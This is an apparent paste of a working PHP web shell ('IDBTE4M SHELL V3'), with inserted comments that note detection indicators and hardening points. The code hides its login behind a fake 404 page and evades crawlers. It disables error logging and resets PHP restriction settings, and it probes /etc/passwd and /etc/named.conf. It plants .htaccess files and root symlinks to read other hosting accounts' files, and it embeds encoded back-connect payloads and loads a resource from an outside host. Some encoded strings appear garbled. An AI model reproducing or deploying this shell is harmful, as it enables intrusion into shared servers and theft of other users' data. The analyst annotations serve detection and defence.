EddieKidiw

-=[ IDBTE4M ]=-

Jan 13th, 2016
  1. <?php
  // Bootstrap of a password-gated PHP web shell (analyst annotations only; code unchanged).
  // Both calls are prefixed with @, so any warning they raise is not reported.
  @session_start();
  @define('SELF_PATH', __FILE__);
  // Hard-coded 32-hex-digit credential. Further down it is compared with md5($_POST['x']),
  // i.e. it is an unsalted MD5 of the operator password. As a fixed literal it is a
  // convenient static signature when hunting for copies of this file.
  $auth_pass = "608e7dc116de7157306012b4f0be82ac";
  // Lifetime, in hours, of the "dm" cookie issued after a successful login.
  $cookie_hour_expire = 24;
  // Crawler evasion: a request whose User-Agent contains "Google" receives a real
  // 404 status and no body, which keeps the file out of search indexes.
  // NOTE(review): HTTP_USER_AGENT is read without isset(); a request with no
  // User-Agent header presumably falls through to the login gate - confirm.
  if (strpos($_SERVER['HTTP_USER_AGENT'], 'Google') !== false) {
  header('HTTP/1.0 404 Not Found');
  exit;
  }
  /**
   * Emits a page that imitates a server "404 Not Found" error, then ends the request.
   *
   * Analyst notes (code unchanged):
   * - No header() call is made in this function, so the response status is whatever
   *   PHP sends by default (presumably 200 - confirm). A "Not Found" body served
   *   without a 404 status is a detection opportunity in access logs.
   * - The form contains a password field named "x" and a submit button with an empty
   *   label; the <style> rule gives inputs a white background and white border, so on
   *   a default white page the login is visually hidden.
   * - "<? $_SERVER['PHP_SELF'] ?>" evaluates the value without echoing it, so no URL
   *   is printed there (with short tags disabled the tag would be emitted as text).
   * - The misspelling "encounteblue" in the body is a stable string to match on.
   */
  function printLogin() { ?>

<html><head><title>404 Not Found</title></head>
<style>
input { margin:0;background-color:#fff;border:1px solid #fff; }
</style>
<body>
<h1>Not Found</h1>
<p>The requested URL <? $_SERVER['PHP_SELF'] ?> was not found on this server.</p>
<p>Additionally, a 404 Not Found error was encounteblue while trying to use an ErrorDocument to handle the request.</p>
<hr>
<form method=post>
<address><?=$_SERVER['SERVER_SIGNATURE'] ?><center><input type=password name=x><input type=submit value=''></center></address>
</form></body></html>
<?php
  // Stop here so nothing below the gate runs for an unauthenticated request.
  exit;
  }
  // Access gate (analyst annotations only; code unchanged).
  // Expected cookie value: MD5 over the Host header, the literal "dm" and the stored hash.
  // In HTTP logs the login shows up as a POST carrying a single field "x", answered
  // with a Set-Cookie for "dm" holding 32 hex digits.
  $cookie_value = md5($_SERVER['HTTP_HOST'] . "dm" . $auth_pass);
  if (isset($_POST['x'])) {
  // Password check: MD5 of the posted field against $auth_pass, with loose (!=) comparison.
  if (md5($_POST['x']) != $auth_pass) {
  // printLogin() ends the request, so a wrong password never reaches the code below.
  printLogin();
  } else {
  // Success: issue the "dm" cookie for $cookie_hour_expire hours. No path, domain,
  // secure or httponly arguments are passed.
  setcookie("dm", $cookie_value, time() + (60 * (60 * $cookie_hour_expire)));
  }
  } elseif (isset($_COOKIE['dm'])) {
  // Returning visitor: the cookie must equal the expected value (again loose comparison).
  if ($_COOKIE['dm'] != $cookie_value) {
  printLogin();
  }
  } elseif (!isset($_COOKIE['dm'])) {
  // Neither a password nor a cookie was supplied: show the fake error page.
  printLogin();
  }
  // Logout: expire the cookie, then redirect the browser back to this script.
  if (isset($_POST['logout'])) {
  setcookie("dm", "", time() - (60 * (60 * 60 * 360000)));
  // The redirect target is built from SERVER_NAME and PHP_SELF and is written into a
  // JavaScript string literal below without any escaping.
  $page = $host = 'http://' . $_SERVER['SERVER_NAME'] . '/' . $_SERVER['PHP_SELF'];
  // The emitted markup closes <span> with "</scan>" (malformed; another matchable string).
  echo '<center><span class="b1"> Please Wait ...</scan></center>';
?>
<script>window.location.href = '<?php print $page; ?>';</script>
<?php exit(0);
  }
  // Runtime tampering (analyst annotations only; code unchanged).
  // Removes the execution time limit and switches off error reporting and error
  // logging, so activity of this file will not show up in PHP error logs. Web server
  // access logs and file-integrity monitoring are the places to look instead.
  @set_time_limit(0);
  @error_reporting(0);
  @ini_set('log_errors', 0);
  @ini_set('error_log', NULL);
  // ini_restore() resets a directive to its configured startup value; the calls below
  // target the directives that normally confine a script (safe_mode*, open_basedir,
  // disable_functions, allow_url_fopen). The safe_mode directives belong to old PHP versions.
  @ini_restore("safe_mode");
  @ignore_user_abort(FALSE);
  @ini_restore("open_basedir");
  // NOTE(review): set_magic_quotes_runtime() here and get_magic_quotes_gpc() below no
  // longer exist in current PHP releases, which points at legacy PHP 5-era hosting as
  // the intended environment - useful when triaging which hosts are exposed.
  @set_magic_quotes_runtime(0);
  @ini_restore("allow_url_fopen");
  @ini_set('max_execution_time', 0);
  @ini_restore("disable_functions");
  @ini_restore("safe_mode_exec_dir");
  @ini_restore("safe_mode_include_dir");
  @ini_set('zlib.output_compression', 'Off');
  // Base URL of the directory holding this script: the full request URL with its last
  // "/"-separated segment removed. str_replace() removes every occurrence of that
  // segment, not only the trailing one.
  $pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  $u = explode("/",$pageURL );
  $pageURL =str_replace($u[count($u)-1],"",$pageURL );

  // Same construction for an ftp:// URL under /public_html/ on the same host name.
  $pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
  $u = explode("/",$pageFTP );
  $pageFTP =str_replace($u[count($u)-1],"",$pageFTP );


  // Undo magic-quotes escaping on POST data when that legacy setting is active.
  // stripslashes() is applied to each top-level value only.
  if(get_magic_quotes_gpc()){
  foreach($_POST as $key=>$value){
  $_POST[$key] = stripslashes($value);
  }
  }
  77. $back_connect="fZFRS8MwF IXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0StktGB8aihs prPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28jS2whVulCf lCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZja3ImclYa gh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92 +rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
  78. $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29r WhyEzc+Z2TjpSserABYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl9 ? 5 /3Wa43fpotyCABR95zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vK C1rI6wgSmN/niYb75i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVC nim7a/ZuJC0JTwf3ARkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlx iuPB3E0/gXejiHMcYjwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3X Ie1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
  79. $jumper="3VRRb5swEP4rFwvNRqVAtkmTEiCTpk7aHjppe5rSiBlsilfAyDZrs2r/fefQpM3LfsCEMObuu++7Ox/IutVAMserTkLdcWvzG1L3otIPN6TInMFbQK07O/IBXa/RStbAAttDDmpQ5a10jFreyLLXQtIQ8hzSEDYwQ6huGroCoSQjV8Zos4JvRzC6vwxZ4kSBi/GLT6PIhPp1ykUNjUbNbVlWb969vYN+OSwh89mcILd8z32yHFojm5xuaEHi4OGa9zImWcKR2OMLuBLKKX ? 1dlrssQY0CzpR+zjTwGZ8db+HTIPQgreJ3E7yq9bhfA4kFd5LR7zRyqpcsDGMCz1qwvgxhpibhGqx0pY ? eVneqVYyma3gcjit0LrLzRoxwYTaSrk9lII2ooglQDbPEEDOHR9w4Y2V7u4NBAWMEHPYnhh4Ovkgt4wf ? D/9vIPBONUYdu4MXzP0BJMVhp7Zqn10JwZFL6la7hvVSfZopG6Yce+ho84oM74g8AJtif73H6MLGCZph41 ? aq+CWNwwHxPRFT0mMGCy3jtV6Ji9aeRDPEAo89t/Akmre5nQ+BQR0wSr6VRdtq7vEjqLsmfGBUZRn6O3K1saPGh/nuzA6R2HIstxsu0cZqNTNEq/9KJSNIf5NvorUBcXft9o5K1beGIAbueikF76/wLdftTTIGCxg+NAkM0+PyvnvBRS/MOZHOanMgX14pviLw=="; ?>
  80.  
  81. <HTML>
  82. <HEAD>
  83. <link href="http://g22b.cc/upload/font.php?file_manager" rel="stylesheet" type="text/css">
  84. <title>-=[ IDBTE4M ]=-</title>
  85. <link rel="SHORTCUT ICON" href="http://kefiex.yu.tl/files/bnx.png">
  86. <body style="background-image: url('http://2.bp.blogspot.com/-LPgZM8E1nKE/VA_RSPtWNvI/AAAAAAAAAu4/Dzs4tTNniFw/s1600/1w2w3.png'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
  87. <script type="text/javascript" src="jquery-1.10.1.min.js" tppabs="http://code.jquery.com/jquery-1.10.1.min.js"></script>
  88. <script type="text/javascript">
  89. $(document).ready(function() {
  90. $(".flip").click(function() {
  91. $(".panel").slideToggle("slow");
  92. });
  93. });
  94. </script>
  95.  
  96. <style type="text/css">
  97. div.panel,p.flip {
  98. margin: 0px;
  99. padding: 0px;
  100. text-align: center;
  101. background: transparent;
  102. }
  103.  
  104. a.panel {
  105. background: transparent;
  106. display: none;
  107. }
  108. </style>
  109. </head>
  110. <style type="text/css">
  111. a { text-decoration:none; }
  112. a:hover{ border-bottom:1px solid yellow; }
  113.  
  114. *{ font-size:11px;font-family:Tahoma,Verdana,Arial;color:#FFFFFF; }
  115.  
  116. #menu{ background:#111111;margin:8px 2px 4px 2px; }
  117.  
  118. #menu a{ padding:4px 18px;
  119. margin:0;
  120.  
  121. background:#222222;
  122. text-decoration:none;
  123. letter-spacing:2px;
  124. border-radius: 4px;
  125. border-bottom:2px solid #444444;
  126. border-top:2px solid #444444;
  127. border-right:2px solid blue;
  128. border-left:2px solid blue;
  129. }
  130.  
  131. #menu a:hover{
  132. background:#191919;
  133. border-radius: 7px;
  134. border-bottom:2px solid #yellow;
  135. border-top:2px solid #yellow;
  136. border-right:2px solid #FF0000;
  137. border-left:2px solid #FF0000;
  138. }
  139.  
  140. .tabnet{ margin:15px auto 0 auto;border: 1px solid #333333; }
  141.  
  142. .main {
  143. width:90%;
  144. margin:30px auto 10px;
  145. padding:10px 10px 5px 10px;
  146. border-radius:5px;
  147. -moz-border-radius:5px;
  148. -moz-box-shadow:0px 0px 10px #FFFFFF;
  149. }
  150.  
  151. .gaya { color: blue; }
  152.  
  153. .gaya a { color: yellow; }
  154.  
  155. .inputz{ background:#111111;
  156. border:0;
  157. padding:2px;
  158. border-bottom:1px solid #FF0000;
  159. border-top:1px solid #FF0000; }
  160.  
  161. .inputzbut{
  162. background:#111111;
  163. color:#FF0000;
  164. margin:0 4px;
  165. border:1px solid #444444;
  166. border-bottom:1px solid #FF0000;
  167. border-top:1px solid #FF0000;
  168. border-right:1px solid #FF0000;
  169. border-left:1px solid #FF0000;
  170. }
  171.  
  172. .inputz:hover, .inputzbut:hover{
  173. border-bottom:1px solid yellow;
  174. border-top:1px solid yellow;
  175. }
  176.  
  177. .output { margin:auto;
  178. border:1px solid #FF0000;
  179. width:100%;
  180. height:400px;
  181. background:#000000;
  182. padding:0 2px; }
  183.  
  184. .cmdbox{ width:100%; }
  185.  
  186. .head_info{ padding: 0 4px; }
  187.  
  188. .dminfox {
  189. font-size:11px;
  190. font-family:Tahoma,Verdana,Arial;
  191. color:yellow;
  192. }
  193.  
  194. .infodmx {
  195. font-size:11px;
  196. font-family:Tahoma,Verdana,Arial;
  197. color:blue;
  198. }
  199.  
  200. .b0{
  201. font-size:30px;padding:0;color:#444444;
  202. }
  203. .b1{
  204. font-size:25px;padding:0;color:blue;
  205. }
  206. .b2{
  207. font-size:25px;padding:0;color:yellow;
  208. }
  209. .b3{
  210. font-size:10px;padding:0;color:blue;
  211. }
  212. .b4{
  213. font-size:20px;padding:0;color:#FF0000;
  214. }
  215. .b5{
  216. font-size:20px;padding:0;color:#FFFFFF;
  217. }
  218. .b6{
  219. font-size:20px;padding:0;color:#00FF00;
  220. }
  221. .b7{
  222. font-size:20px;padding:0;color:blue;
  223. }
  224. .b8{
  225. font-size:20px;padding:0;color:yellow;
  226. }
  227. .b9{
  228. font-size:20px;padding:0;color:yellow;
  229. }
  230. .b10{
  231. font-size:20px;padding:0;color:#444444;
  232. }
  233. .b11{
  234. font-size:10px;padding:0;color:yellow;
  235. }
  236. .b12{
  237. font-size:10px;padding:0;color:#444444;
  238. }
  239.  
  240. .b_tbl{ text-align:center;
  241. margin:0 1px 0 0;
  242. padding:0 1px 0 0;
  243. border-right:1px solid #333333; }
  244.  
  245. .c_tbl{ text-align:center;
  246. margin:0 4px 0 0;
  247. padding:0 4px 0 0;
  248. border-left:1px solid #333333; }
  249.  
  250. .phpinfo table{ width:100%;
  251. padding:0 0 0 0; }
  252.  
  253. .phpinfo td{ background:#191919;
  254. color:#cccccc;
  255. padding:6px 8px;; }
  256.  
  257. .phpinfo th, th{ background:#111111;
  258. border-bottom:1px solid #333333;
  259. font-weight:normal; }
  260.  
  261. .phpinfo h2, .phpinfo h2 a{ text-align:center;
  262. font-size:16px;
  263. padding:0;
  264. margin:30px 0 0 0;
  265. background:#222222;
  266. padding:4px 0; }
  267.  
  268. .explore{ width:100%; }
  269.  
  270. .explore a { text-decoration:none; }
  271. .explore td{ border-bottom:1px solid yellow;
  272. padding:0 8px;
  273. line-height:10px; }
  274.  
  275. .explore th{ padding:3px 8px;
  276. font-weight:normal; }
  277.  
  278. .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid yellow; }
  279.  
  280. .explore tr:hover{ background:#444444;
  281. cursor:pointer; }
  282.  
  283. .viewfile{ background:#EDECEB;
  284. color:#000000;
  285. margin:4px 2px;
  286. padding:8px; }
  287.  
  288. .sembunyi{ display:none;
  289. padding:0;margin:0;}
  290.  
  291. .info{ background:#111111;
  292. width:99%;
  293. padding:5px;
  294. margin:10px auto 5px;
  295. text-align:center;
  296. font-size:13px;}
  297.  
  298. .info a{ font-size:14px;}
  299. .info span{ font-size:14px;}
  300. .jaya{ margin:5px; text-align:right; }
  301. </style>
  302. </head>
  303. <center><SCRIPT>
  304. farbbibliothek = new Array();
  305. farbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100");
  306. farbbibliothek[1] = new Array("#00FF00","#000000","#00FF00","#00FF00");
  307. farbbibliothek[2] = new Array("#00FF00","#FF0000","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00");
  308. farbbibliothek[3] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040");
  309. farbbibliothek[4] = new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000");
  310. farbbibliothek[5] = new Array("#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF");
  311. farbbibliothek[6] = new Array("#0000FF","#FFFF00");
  312. farben = farbbibliothek[4];
  // Banner animation step: colours the element "a<i>" with farben[i] for every entry
  // of the global Buchstabe array, then calls farbverlauf().
  // Uses document.all, a legacy lookup; reads the globals Buchstabe and farben.
  function farbschrift()
  {
  for(var i=0 ; i<Buchstabe.length; i++)
  {
  document.all["a"+i].style.color=farben[i];
  }
  farbverlauf();
  }
  // Splits `text` into the global array Buchstabe, one character per entry.
  // First doubles the global palette farben until it is at least as long as the text.
  function string2array(text)
  {
  Buchstabe = new Array();
  while(farben.length<text.length)
  {
  farben = farben.concat(farben);
  }
  // k is an implicit global. The loop runs to k == text.length inclusive, so the last
  // entry stored is charAt(text.length), which is the empty string.
  k=0;
  while(k<=text.length)
  {
  Buchstabe[k] = text.charAt(k);
  k++;
  }
  }
  // Writes one <span id="a<i>"> per entry of Buchstabe into the page with
  // document.write, then starts the colour animation via farbschrift().
  // Characters are inserted without HTML escaping; the text comes from a constant
  // assigned elsewhere in this script.
  function divserzeugen()
  {
  for(var i=0 ; i<Buchstabe.length; i++)
  {
  document.write("<font face='monotype corsiva' size=30><span id='a"+i+"' class='a"+i+"'>"+Buchstabe[i] + "</span></font>");
  }
  farbschrift();
  }
  343. var a=1;
  // Rotates the global palette farben left by one position and schedules the next
  // repaint in 30 ms.
  function farbverlauf()
  {
  // With i = 0 the first assignment stores farben[0] under the key -1; every other
  // element moves down one slot.
  for(var i=0 ; i<farben.length; i++)
  {
  farben[i-1]=farben[i];
  }
  // The former first colour, parked at farben[-1], becomes the last element.
  farben[farben.length-1]=farben[-1];

  // String form of setTimeout: the text is evaluated as code when the timer fires.
  setTimeout("farbschrift()",30);
  }
  354. var farbsatz=1;
  // Switches the active palette to farbbibliothek[farbsatz], pads it to the length of
  // the global `text`, then picks the palette index for the next call at random.
  function farbtauscher()
  {
  farben = farbbibliothek[farbsatz];
  while(farben.length<text.length)
  {
  farben = farben.concat(farben);
  }
  // Subtracting 0.0001 before flooring keeps the result within 0 .. length-1.
  farbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001));
  }
  364. setInterval("farbtauscher()",5000);
  365. text= "-=[+] IDBTE4M SHELL V3 [+]=- ";
  366. </script><span class='newclass'>
  367. <script type="text/javascript">
  368. string2array(text);
  369. divserzeugen();
  370. </script></span></center></tbody></table><br/>
  371. <script type="text/javascript">
  372. function tukar(lama,baru){ document.getElementById(lama).style.display = "none"; document.getElementById(baru).style.display = "block"; } </script> <table border="1"><tbody>
  373. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  374. <center>
  375.  
  376. <tr><td>
  377.  
  378.  
  379. <center>
  380. <div id="menu" align="center"><table><tr>
  381. <td style=\"text-align:center;\"><nobr><b></b><a href="?">-=[ HOME </a></nobr></td>
  382. <td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "y=".$pwd; ?>&amp;x=php">EVAL</a></b></nobr></td>
  383. <td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "y=".$pwd; ?>&amp;x=mysql">SQL 1</a></b></nobr></td>
  384. <td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "y=".$pwd; ?>&amp;x=phpinfo">INFO</a></b></nobr></td>
  385. <td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit">SPLOIT</a></b></nobr></td>
  386. <td style=\"text-align:center;\"><nobr><b><a href="?idb=salto">SALTO ]=-</a></b></nobr></td>
  387. </tr></table></div>
  388.  
  389. <div id="menu" align="center"><table><tr>
  390. <td style=\"text-align:center;\"><b><a href="?<?php echo "y=".$pwd; ?>&amp;x=shell">-=[ SHELL</a></b></td>
  391. <td style=\"text-align:center;\"><b><a href="?sws=sym">SYM1</a></b></td>
  392. <td style=\"text-align:center;\"><b><a href="?idb=domain">Domain</a></b></td>
  393. <td style=\"text-align:center;\"><b><a href="?sws=file">Manual</a></b></td>
  394. <td style=\"text-align:center;\"><b><a href="?sws=passwd">Bypass</a></b></td>
  395. <td style=\"text-align:center;\"><b><a href="?idb=auto">Auto ]=-</a></b></td>
  396. </tr></table></div>
  397.  
  398. <div id="menu" align="center"><table><tr>
  399. <td style=\"text-align:center;\"><b><a href="?sws=joomla">-=[ Joomla</a></b></td>
  400. <td style=\"text-align:center;\"><b><a href="?sws=wp">WordPress</a></b></td>
  401. <td style=\"text-align:center;\"><b><a href="?sws=vb">vBulletin</a></b></td>
  402. <td style=\"text-align:center;\"><b><a href="?idb=sql">SQL2</a></b></td>
  403. <td style=\"text-align:center;\"><b><a href="?idb=config">CONFIG</a></b></td>
  404. <td style=\"text-align:center;\"><b><a href="?idb=cp">CP++ ]=-</a></b></td>
  405. </tr></table></div>
  406.  
  407. </center>
  408. <p>
  409. <center>
  410. <div class="mg">
  411. <?php
  // Reconnaissance banner (analyst annotations only; code unchanged).
  // Tests whether the PHP process can read four system locations and prints each one
  // either as a green link (readable) or as plain blue text (not readable).
  // NOTE(review): the paths probed are DNS zone configuration, the account list and
  // the mail-alias directory; which of them the web server user can read is a matter
  // of host file permissions - worth checking during hardening.
  // The <a> elements echoed below are never closed.
  if(is_readable("/etc/named.conf")){
  echo '-=[ <a href="?do=etc_named.conf" ><font color="green">/etc/named.conf</font> ]-';
  }else{
  echo '-[ <font color="blue">/etc/named.conf</font> ]-';
  }

  if(is_readable("/etc/passwd")){
  echo '-[ <a href="?do=etc_passwd" ><font color="green">/etc/passwd</font> ]-';
  }else{
  echo '-[ <font color="blue">/etc/passwd</font> ]-';
  }

  if(is_readable("/etc/valiases")){
  echo '-[ <a href="?do=etc_valiases" ><font color="green">/etc/valiases exists</font> ]-';

  }else{
  echo '-[ <font color="blue">/etc/valiases</font> ]-';
  }

  if(is_readable("/var/named")){
  echo '-[ <a href="?do=var_named" ><font color="green">/var/named</font> ]=-';

  }else{
  echo '-[ <font color="blue">/var/named</font> ]=-';
  }
  437.  
  438. ?></center>
  439. </div></div> </tr></table></tbody></table> </div>
  440.  
  441. <?php
  442.  
  // File-system artefacts created on every authenticated page load (analyst
  // annotations only; code unchanged). These names are the indicators to look for
  // next to the script: directories "empek" and "idb", each with its own .htaccess,
  // and the symbolic links "empek/amis.txt" and "idb/te4m", both pointing at "/".
  // NOTE(review): hardening that blunts this pattern - restrict AllowOverride so that
  // per-directory files cannot set Options or handlers, prefer SymLinksIfOwnerMatch
  // over FollowSymLinks, and keep account home directories unreadable to other
  // accounts. Confirm against the server's actual Apache configuration.

  // World-writable directory; errors suppressed.
  @mkdir('empek',0777);
  // .htaccess content: enables directory indexes and symlink following, and remaps
  // the .php extension (AddType/AddHandler "txt"), presumably so that PHP files
  // reached through the link are returned as text rather than executed.
  $htcs = "Options Indexes FollowSymLinks\nDirectoryIndex amis.txt\nAddType txt .php\nAddHandler txt .php";
  // The fopen() result is not checked before fwrite(), and the handle is never closed.
  $f =@fopen ('empek/.htaccess','w');
  fwrite($f , $htcs);
  // Link to the file-system root, named like a text file.
  @symlink("/","empek/amis.txt");
  // File name of this script; used later to build form action URLs.
  $pg = basename(__FILE__);

  // Second directory with a broader .htaccess: "Options all", text/plain typing for
  // .php and .html, plus "Require None" and "Satisfy Any" - presumably meant to
  // sidestep access restrictions; verify how the installed Apache treats them.
  @mkdir('idb',0777);
  $htcs = "Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any";
  $f =@fopen ('idb/.htaccess','w');
  fwrite($f , $htcs);
  // Second link to the file-system root.
  @symlink("/","idb/te4m");
  $pg = basename(__FILE__);
  463.  
  464.  
  465.  
  466.  
  467.  
  468. if(isset($_REQUEST['sws']))
  469. {
  470.  
  471. switch ($_REQUEST['sws'])
  472. {
  473.  
  474. /// user + domine + symlink ///
  475.  
  476. case 'sym':
  477.  
  478. if(!is_file('named.txt')){
  479.  
  480. $d00m = @file("/etc/named.conf");
  481.  
  482. }else{
  483.  
  484. $d00m = @file("named.txt");
  485.  
  486.  
  487. }
  488. if(!$d00m)
  489. {
  490.  
  491. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  492. }
  493. else
  494.  
  495. {
  496. echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
  497. foreach($d00m as $dom){
  498.  
  499. if(eregi("zone",$dom)){
  500.  
  501. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  502.  
  503. flush();
  504.  
  505. if(strlen(trim($domsws[1][0])) > 2){
  506.  
  507. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  508.  
  509. flush();
  510.  
  511.  
  512.  
  513. $site = $user['name'] ;
  514.  
  515.  
  516. @symlink("/","empek/amis.txt");
  517.  
  518. $site = $domsws[1][0];
  519.  
  520. $ir = 'ir';
  521.  
  522. $il = 'il';
  523.  
  524. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
  525. {
  526. $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px blue; '>".$domsws[1][0]."</div>";
  527. }
  528.  
  529.  
  530. echo "
  531. <tr>
  532.  
  533. <td>
  534. <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
  535. </td>
  536.  
  537.  
  538. <td>
  539. ".$user['name']."
  540. </td>
  541.  
  542.  
  543.  
  544.  
  545.  
  546.  
  547. <td>
  548. <a href='empek/amis.txt/home/".$user['name']."/public_html' target='_blank'>symlink </a>
  549. </td>
  550.  
  551.  
  552. </tr></div> ";
  553.  
  554.  
  555. flush();
  556. flush();
  557.  
  558. }
  559. }
  560. }
  561. }
  562.  
  563.  
  564.  
  565.  
  566. break;
  567.  
  568.  
  569. /// file symlink ///
  570.  
  571. case 'file':
  572.  
  573. echo'
  574. The file path to symlink
  575.  
  576. <br /><br />
  577. <form method="post">
  578. <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
  579. <input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
  580. <input type="submit" value="symlink" name="symlink" /> <br /><br />
  581.  
  582.  
  583.  
  584. </form>
  585. ';
  586.  
  587. $pfile = $_POST['file'];
  588. $symfile = $_POST['symfile'];
  589. $symlink = $_POST['symlink'];
  590.  
  591. if ($symlink)
  592. {
  593.  
  594.  
  595. @mkdir('sym1',0777);
  596. $c = "Options Indexes FollowSymLinks\nDirectoryIndex tr.phtml\nAddType txt .php\nAddHandler txt .php";
  597. $f =@fopen ('sym1/.htaccess','w');
  598. @fwrite($f , $c);
  599.  
  600. @symlink("$pfile","sym1/$symfile");
  601.  
  602. echo '<br /><a target="_blank" href="sym1/'.$symfile.'" >'.$symfile.'</a>';
  603.  
  604. }
  605.  
  606.  
  607.  
  608. break;
  609.  
  610. /// bypass read
  611.  
  612. case 'read':
  613.  
  614. echo "read /etc/named.conf";
  615. echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
  616. flush();
  617. flush();
  618.  
  619.  
  620. $file = '/etc/named.conf';
  621.  
  622.  
  623. $r3ad = @fopen($file, 'r');
  624. if ($r3ad){
  625. $content = @fread($r3ad, @filesize($file));
  626. echo "".htmlentities($content)."";
  627. }
  628. else if (!$r3ad)
  629. {
  630. $r3ad = @show_source($file) ;
  631. }
  632. else if (!$r3ad)
  633. {
  634. $r3ad = @highlight_file($file);
  635. }
  636. else if (!$r3ad)
  637. {
  638. $sm = @symlink($file,'sym.txt');
  639.  
  640.  
  641. if ($sm){
  642. $r3ad = @fopen('empek/sym.txt', 'r');
  643. $content = @fread($r3ad, @filesize($file));
  644. echo "".htmlentities($content)."";
  645.  
  646. }
  647. }
  648.  
  649.  
  650.  
  651. echo "</textarea><br /><br /><input type='submit' value='Save'/> </form>";
  652.  
  653.  
  654. if(isset($_GET['save'])){
  655.  
  656.  
  657. $cont = stripcslashes($_POST['file']);
  658.  
  659. $f = fopen('named.txt','w');
  660.  
  661. $w = fwrite($f,$cont);
  662.  
  663. if($w){
  664.  
  665. echo '<br />save has been successfully';
  666.  
  667. }
  668.  
  669. fclose($f);
  670.  
  671.  
  672.  
  673.  
  674. }
  675.  
  676.  
  677.  
  678. break;
  679.  
  680. // passwd
  681.  
  682. case 'passwd':
  683.  
  684. if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
  685.  
  686.  
  687. $cont = stripcslashes($_POST['file']);
  688.  
  689. if(!file_exists('passwd.txt')){
  690.  
  691. $f = @fopen('passwd.txt','w');
  692.  
  693. $w = @fwrite($f,$cont);
  694.  
  695. fclose($f);
  696. }
  697. if($w or @filesize('passwd.txt') > 0){
  698. // * SHOW * //
  699.  
  700. echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
  701. flush();
  702.  
  703. $fil3 = file('passwd.txt');
  704.  
  705. foreach ($fil3 as $f){
  706.  
  707. $u=explode(':', $f);
  708. $user = $u['0'];
  709.  
  710.  
  711.  
  712. echo "
  713. <tr>
  714.  
  715.  
  716.  
  717. <td width='15%'>
  718. $user
  719. </td>
  720.  
  721.  
  722.  
  723.  
  724.  
  725.  
  726. <td width='10%'>
  727. <a href='empek/amis.txt/home/$user/public_html' target='_blank'>Symlink </a>
  728. </td>
  729.  
  730. <td width='10%'>
  731. <a href='$pageFTP/empek/amis.txt/home/$user/public_html' target='_blank'>FTP</a>
  732. </td>
  733.  
  734.  
  735.  
